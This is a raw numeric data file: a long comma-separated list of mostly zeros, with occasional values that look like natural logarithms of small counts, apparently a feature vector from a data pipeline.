0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 2.0794415416798357, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.4825185607408002, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8005740880419454, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 3.2958368660043296, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.110873864173311, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.969813299576001, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 2.1972245773362196, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.105134969404935, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.581130849408909, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.917171988845775, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.281419193361606, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 